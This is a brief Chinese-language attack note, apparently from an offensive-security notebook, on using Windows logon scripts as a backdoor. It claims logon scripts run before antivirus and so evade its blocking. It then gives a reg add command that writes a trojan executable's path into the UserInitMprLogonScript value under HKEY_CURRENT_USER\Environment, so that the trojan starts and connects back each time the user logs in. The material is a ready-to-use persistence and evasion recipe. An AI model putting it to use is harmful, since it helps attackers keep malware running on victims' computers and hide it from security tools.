logon scripts后门

Windows登录脚本，当用户登录时触发，Logon Scripts能够优先于杀毒软件执行，绕过杀毒软件对敏感操作的拦截

注册表位置：HKEY_CURRENT_USER\Environment

在命令行往注册表写入服务，/d后面写入木马程序路径

reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_SZ /d "C:\1704679998.exe"

当用户执行登录动作时，木马上线。